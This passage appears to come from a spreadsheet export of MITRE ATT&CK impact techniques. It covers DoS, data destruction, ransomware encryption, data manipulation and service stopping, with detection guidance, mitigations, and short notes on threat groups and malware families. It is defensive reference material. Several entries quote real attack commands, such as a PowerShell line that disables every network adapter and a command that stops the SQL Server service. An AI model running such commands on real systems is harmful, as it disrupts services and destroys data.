As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)
APT28
In 2016, [APT28](https://attack.mitre.org/groups/G0007) conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency.(Citation: US District Court Indictment GRU Oct 2018)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can execute TCP, UDP,  and HTTP denial of service (DoS) attacks.(Citation: Unit 42 Lucifer June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Host Status
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)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Filter Network Traffic
Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Storage Deletion
Monitor for unexpected deletion of a cloud storage infrastructure, such as the &lt;code&gt;DeleteDBCluster&lt;/code&gt; and &lt;code&gt;DeleteGlobalCluster&lt;/code&gt; events in AWS, or a high quantity of data deletion events, such as &lt;code&gt;DeleteBucket&lt;/code&gt;. Many of these events within a short period of time may indicate malicious activity.
Command Execution
Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.
File Deletion
Monitor for unexpected deletion to a file (ex: Sysmon EID 23) 
File Modification
Monitor for changes made to a large quantity of files for unexpected modifications in user directories and under C:\Windows\System32\.
Image Deletion
Monitor for unexpected deletion of a virtual machine image (ex: Azure Compute Service Images DELETE)
Instance Deletion
Monitor for unexpected deletion of an instance (ex: instance.delete within GCP Audit Logs)
Process Creation
Monitor for newly executed processes of binaries that could be involved in data destruction activity, such as SDelete.
Snapshot Deletion
Monitor for unexpected deletion of a snapshot (ex: AWS delete-snapshot)
Volume Deletion
Monitor for unexpected deletion of a cloud volume (ex: AWS delete-volume)
Data Backup
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used a custom secure delete function to make deleted files unrecoverable.(Citation: FireEye APT38 Oct 2018)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used tools to delete files and folders from victims' desktops and profiles.(Citation: CERT-EE Gamaredon January 2021)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has deleted the target's systems and resources both on-premises and in the cloud.(Citation: MSTIC DEV-0537 Mar 2022)(Citation: NCC Group LAPSUS Apr 2022)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a custom secure delete function to overwrite file contents with data from heap memory.(Citation: Novetta Blockbuster)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used the [BlackEnergy](https://attack.mitre.org/software/S0089) KillDisk component to overwrite files on Windows-based Human-Machine Interfaces. (Citation: US-CERT Ukraine Feb 2016)(Citation: ESET Telebots June 2017)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a "Destroy" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)(Citation: ESET BlackEnergy Jan 2016)
CaddyWiper
[CaddyWiper](https://attack.mitre.org/software/S0693) can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can delete specified files from a targeted system.(Citation: Fortinet Diavol July 2021)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files(x86)`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. [HermeticWiper](https://attack.mitre.org/software/S0697) can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes.(Citation: ESET Hermetic Wizard March 2022)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.(Citation: Dragos Crashoverride 2017)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) can overwrite files with random data before deleting them.(Citation: Unit 42 Kazuar May 2017)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) deletes system files to make the OS unbootable. [KillDisk](https://attack.mitre.org/software/S0607) also targets and deletes files with 35 different file extensions.(Citation: ESEST Black Energy Jan 2016)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.(Citation: Check Point Meteor Aug 2021)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) overwrites files locally and on remote shares.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) 
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) has a command to write random data across a file and delete it.(Citation: Volexity PowerDuke November 2016)
Proxysvc
[Proxysvc](https://attack.mitre.org/software/S0238) can overwrite files indicated by the attacker before deleting them.(Citation: McAfee GhostSecret)
REvil
[REvil](https://attack.mitre.org/software/S0496) has the capability to destroy files and folders.(Citation: Kaspersky Sodin July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)
RawDisk
[RawDisk](https://attack.mitre.org/software/S0364) was used in [Shamoon](https://attack.mitre.org/software/S0140) to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)
SDelete
[SDelete](https://attack.mitre.org/software/S0195) deletes data in a way that makes it unrecoverable.(Citation: Microsoft SDelete July 2016)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) has a disk wiper module that targets files other than those in the Windows directory.(Citation: Kaspersky StoneDrill 2017)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can corrupt files by overwriting the first 1 MB with `0xcc` and appending random extensions.(Citation: Microsoft WhisperGate January 2022)(Citation: Crowdstrike WhisperGate January 2022)(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)(Citation: Medium S2W WhisperGate January 2022)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) has destroyed Linux-based databases as part of its ransomware capabilities.(Citation: Unit42 Xbash Sept 2018)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Storage Modification
Monitor for changes made in cloud environments for events that indicate storage objects have been anomalously modified.
Command Execution
Monitor executed commands and arguments for actions involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit
File Creation
Monitor for newly constructed files in user directories.
File Modification
Monitor for changes made to files in user directories.
Network Share Access
Monitor for unexpected network shares being accessed on target systems or on large numbers of systems.
Process Creation
Monitor for newly constructed  processes and/or command-lines involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit.
Behavior Prevention on Endpoint
On Windows 10, enable cloud-delivered protection and Attack Surface Reduction (ASR) rules to block the execution of files that resemble ransomware. (Citation: win10_asr)
Data Backup
Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery. Consider enabling versioning in cloud environments to maintain backup copies of storage objects.(Citation: Rhino S3 Ransomware Part 2)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used [Conti](https://attack.mitre.org/software/S0575) ransomware to encrypt a compromised network.(Citation: DFIR Conti Bazar Nov 2021)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used [AvosLocker](https://attack.mitre.org/software/S1053) ransomware to encrypt files on the compromised network.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used Hermes ransomware to encrypt files with AES256.(Citation: FireEye APT38 Oct 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.(Citation: FireEye APT41 Aug 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has encrypted virtual disk volumes on ESXi servers using a version of Darkside ransomware.(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has deployed ransomware such as [Ragnar Locker](https://attack.mitre.org/software/S0481), White Rabbit, and attempted to execute Noberus on compromised networks.(Citation: Symantec FIN8 Jul 2023)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has encrypted domain-controlled systems using [BitPaymer](https://attack.mitre.org/software/S0570).(Citation: Crowdstrike Indrik November 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used BitLocker and DiskCryptor to encrypt targeted workstations. (Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used [Prestige](https://attack.mitre.org/software/S1058) ransomware to encrypt data at targeted organizations in transportation and related logistics industries in Ukraine and Poland.(Citation: Microsoft Prestige ransomware October 2022)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used a wide variety of ransomware, such as [Clop](https://attack.mitre.org/software/S0611), Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.(Citation: Proofpoint TA505 Sep 2017)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) encrypts the victim system using a combination of AES256 and RSA encryption schemes.(Citation: Arxiv Avaddon Feb 2021)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has encrypted files and network resources using AES-256 and added an `.avos`, `.avos2`, or `.AvosLinux` extension to filenames.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Cisco Talos Avos Jun 2022)(Citation: Joint CSA AvosLocker Mar 2022)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) can use ChaCha8 and ECDH to encrypt data.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has encrypted files and disks using AES-128-CBC and RSA-2048.(Citation: Secure List Bad Rabbit)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending &lt;code&gt;.locked&lt;/code&gt; to the filename.(Citation: Crowdstrike Indrik November 2018)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can encrypt files with the ChaCha20 cypher and using a multithreaded process to increase speed.(Citation: Minerva Labs Black Basta May 2022)(Citation: BlackBerry Black Basta May 2022)(Citation: Cyble Black Basta May 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Uptycs Black Basta ESXi June 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)(Citation: Check Point Black Basta October 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) has the ability to encrypt Windows devices, Linux devices, and VMWare instances.(Citation: Microsoft BlackCat Jun 2022)
Clop
[Clop](https://attack.mitre.org/software/S0611) can encrypt files using AES, RSA, and RC4 and will add the ".clop" extension to encrypted files.(Citation: Mcafee Clop Aug 2019)(Citation: Unit42 Clop April 2021)(Citation: Cybereason Clop Dec 2020) 
Conti
[Conti](https://attack.mitre.org/software/S0575) can use &lt;code&gt;CreateIoCompletionPort()&lt;/code&gt;, &lt;code&gt;PostQueuedCompletionStatus()&lt;/code&gt;, and &lt;code&gt;GetQueuedCompletionPort()&lt;/code&gt; to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. [Conti](https://attack.mitre.org/software/S0575) can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)(Citation: CrowdStrike Wizard Spider October 2020)(Citation: DFIR Conti Bazar Nov 2021)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has the ability to encrypt system data and add the ".cuba" extension to encrypted files.(Citation: McAfee Cuba April 2021) 
DCSrv
[DCSrv](https://attack.mitre.org/software/S1033) has encrypted drives using the core encryption mechanism from DiskCryptor.(Citation: Checkpoint MosesStaff Nov 2021)
DEATHRANSOM
[DEATHRANSOM](https://attack.mitre.org/software/S0616) can use public and private key pair encryption to encrypt files for ransom payment.(Citation: FireEye FiveHands April 2021)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has encrypted files using an RSA key though the `CryptEncrypt` API and has appended filenames with ".lock64". (Citation: Fortinet Diavol July 2021)
EKANS
[EKANS](https://attack.mitre.org/software/S0605) uses standard encryption library functions to encrypt files.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) 
FIVEHANDS
[FIVEHANDS](https://attack.mitre.org/software/S0618) can use an embedded NTRU public key to encrypt data for ransom.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)(Citation: NCC Group Fivehands June 2021)
HELLOKITTY
[HELLOKITTY](https://attack.mitre.org/software/S0617) can use an embedded RSA-2048 public key to encrypt victim data for ransom.(Citation: FireEye FiveHands April 2021)
JCry
[JCry](https://attack.mitre.org/software/S0389) has encrypted files and demanded Bitcoin to decrypt those files. (Citation: Carbon Black JCry May 2019)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) has a ransomware component that encrypts files with an AES key that is also RSA-1028 encrypted.(Citation: KillDisk Ransomware)
LockerGoga
[LockerGoga](https://attack.mitre.org/software/S0372) has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)(Citation: Wired Lockergoga 2019)
Maze
[Maze](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [Maze](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.(Citation: IBM MegaCortex)(Citation: mbed-crypto)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can encrypt files on infected machines to extort victims.(Citation: TrendMicro Netwalker May 2020)	
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) encrypts user files and disk structures like the MBR with 2048-bit RSA.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Pay2Key
[Pay2Key](https://attack.mitre.org/software/S0556) can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)
Prestige
[Prestige](https://attack.mitre.org/software/S1058) has leveraged the CryptoPP C++ library to encrypt files on target systems using AES and appended filenames with `.enc`.(Citation: Microsoft Prestige ransomware October 2022)
ProLock
[ProLock](https://attack.mitre.org/software/S0654) can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.(Citation: Group IB Ransomware September 2020)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.(Citation: CERT-FR PYSA April 2020) 
REvil
[REvil](https://attack.mitre.org/software/S0496) can encrypt files on victim systems and demands a ransom to decrypt the files.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee REvil October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)
RobbinHood
[RobbinHood](https://attack.mitre.org/software/S0400) will search for an RSA encryption key and then perform its encryption process on the system files.(Citation: CarbonBlack RobbinHood May 2019) 
Royal
[Royal](https://attack.mitre.org/software/S1073) uses a multi-threaded encryption process that can partially encrypt targeted files with the OpenSSL library and the AES256 algorithm.(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Wizard Spider October 2020)
SamSam
[SamSam](https://attack.mitre.org/software/S0370) encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.(Citation: Sophos SamSam Apr 2018)
Seth-Locker
[Seth-Locker](https://attack.mitre.org/software/S0639) can encrypt files on a targeted system, appending them with the suffix .seth.(Citation: Trend Micro Ransomware February 2021)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) has an operational mode for encrypting data instead of overwriting it.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)
SynAck
[SynAck](https://attack.mitre.org/software/S0242) encrypts the victims machine followed by asking the victim to pay a ransom. (Citation: SecureList SynAck Doppelgänging May 2018)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.(Citation: wardle evilquest partii)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) can encrypt data and leave a ransom note.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020) 
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) performs AES-CBC encryption on files under &lt;code&gt;~/Documents&lt;/code&gt;, &lt;code&gt;~/Downloads&lt;/code&gt;, and
&lt;code&gt;~/Desktop&lt;/code&gt; with a fixed key and renames files to give them a &lt;code&gt;.enc&lt;/code&gt; extension. Only files with sizes 
less than 500MB are encrypted.(Citation: trendmicro xcsset xcode project 2020)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.(Citation: Unit42 Xbash Sept 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files in order to manipulate external outcomes or hide activity
File Deletion
Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity 
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity
File Modification
Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity
Network Traffic Content
Monitor for networks that solicits and obtains the configuration information of the queried device. 
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices.
OS API Execution
Monitor for API calls associated with altering data. Remote access tools with built-in features may interact directly with the Windows API to gather information.
Encrypt Sensitive Information
Consider encrypting important information to reduce an adversary’s ability to perform tailored data modifications.
Network Segmentation
Identify critical business and system processes that may be targeted by adversaries and work to isolate and secure those systems against unauthorized access and tampering.
Remote Data Storage
Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and manipulate backups.
Restrict File and Directory Permissions
Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk.
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has injected fraudulent transactions into compromised networks that mimic legitimate behavior to siphon off incremental amounts of money.(Citation: Sygnia Elephant Beetle Jan 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files in order to manipulate external outcomes or hide activity
File Deletion
Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity 
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity
File Modification
Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity
OS API Execution
Monitor for API calls associated with altering data. Remote access tools with built-in features may interact directly with the Windows API to gather information.
Network Segmentation
Identify critical business and system processes that may be targeted by adversaries and work to isolate and secure those systems against unauthorized access and tampering.
Restrict File and Directory Permissions
Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code.
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.(Citation: FireEye APT38 Oct 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may stop or disable services on a system to render those services unavailable to legitimate users.
File Modification
Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.
OS API Execution
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
Process Creation
Monitor for newly executed processes that may stop or disable services on a system to render those services unavailable to legitimate users.
Process Termination
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Service Metadata
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values that may stop or disable services on a system to render those services unavailable to legitimate users.
Network Segmentation
Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.
Restrict File and Directory Permissions
Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.
Restrict Registry Permissions
Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.
User Account Management
Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used [PsExec](https://attack.mitre.org/software/S0029) to stop services prior to the execution of ransomware.(Citation: Symantec WastedLocker June 2020)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has shut down virtual machines from within a victim's on-premise VMware ESXi infrastructure.(Citation: NCC Group LAPSUS Apr 2022)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.(Citation: Novetta Blockbuster Destructive Malware)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.(Citation: DFIR Ryuk's Return October 2020)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) looks for and attempts to stop database processes.(Citation: Arxiv Avaddon Feb 2021)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has terminated specific processes before encryption.(Citation: Malwarebytes AvosLocker Jul 2021)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) can stop specific services related to backups.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) has the ability to stop VM services on compromised networks.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)
Clop
[Clop](https://attack.mitre.org/software/S0611) can kill several processes and services related to backups and security solutions.(Citation: Unit42 Clop April 2021)(Citation: Mcafee Clop Aug 2019) 
Conti
[Conti](https://attack.mitre.org/software/S0575) can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of &lt;code&gt;net stop&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has a hardcoded list of services and processes to terminate.(Citation: McAfee Cuba April 2021)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) will terminate services using the Service Control Manager (SCM) API.(Citation: Fortinet Diavol July 2021) 
EKANS
[EKANS](https://attack.mitre.org/software/S0605) stops database, data backup solution, antivirus, and ICS-related processes.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)(Citation: Palo Alto Unit 42 EKANS)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to stop the Volume Shadow Copy service.(Citation: Qualys Hermetic Wiper March 2022)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to stop services on the infected host.(Citation: Carbon Black HotCroissant April 2020)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604)’s data wiper module writes zeros into the registry keys in &lt;code&gt;SYSTEM\CurrentControlSet\Services&lt;/code&gt; to render a system inoperable.(Citation: Dragos Crashoverride 2017)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) terminates various processes to get the user to reboot the victim machine.(Citation: Trend Micro KillDisk 2)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) can kill processes and delete services.(Citation: Proofpoint LookBack Malware Aug 2019)
Maze
[Maze](https://attack.mitre.org/software/S0449) has stopped SQL services to ensure it can encrypt any database.(Citation: Sophos Maze VM September 2020) 
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) can stop and disable services on the system.(Citation: IBM MegaCortex) 
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can disconnect all network adapters on a compromised host using `powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }" &gt; NUL`.(Citation: Check Point Meteor Aug 2021)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can terminate system processes and services, some of which relate to backup software.(Citation: TrendMicro Netwalker May 2020)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the API call &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; to disable all services on the affected system.(Citation: Talos Olympic Destroyer 2018)
Pay2Key
[Pay2Key](https://attack.mitre.org/software/S0556) can stop the MS SQL service at the end of the encryption process to release files locked by the service.(Citation: Check Point Pay2Key November 2020)
Prestige
[Prestige](https://attack.mitre.org/software/S1058) has attempted to stop the MSSQL Windows service to ensure successful encryption using `C:\Windows\System32\net.exe stop MSSQLSERVER`.(Citation: Microsoft Prestige ransomware October 2022)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) can stop services and processes.(Citation: CERT-FR PYSA April 2020) 
REvil
[REvil](https://attack.mitre.org/software/S0496) has the capability to stop services and kill processes.(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.(Citation: Sophos Ragnar May 2020)
RobbinHood
[RobbinHood](https://attack.mitre.org/software/S0400) stops 181 Windows services on the system before beginning the encryption process.(Citation: CarbonBlack RobbinHood May 2019) 
Royal
[Royal](https://attack.mitre.org/software/S1073) can use `RmShutDown` to kill  applications and services using the resources that are targeted for encryption.(Citation: Cybereason Royal December 2022)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) has called &lt;code&gt;kill.bat&lt;/code&gt; for stopping services, disabling services and killing processes.(Citation: CrowdStrike Ryuk January 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to stop processes and services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files in order to manipulate external outcomes or hide activity
File Deletion
Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity 
File Modification
Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity
Encrypt Sensitive Information
Consider encrypting important information to reduce an adversary’s ability to perform tailored data modifications.
Remote Data Storage
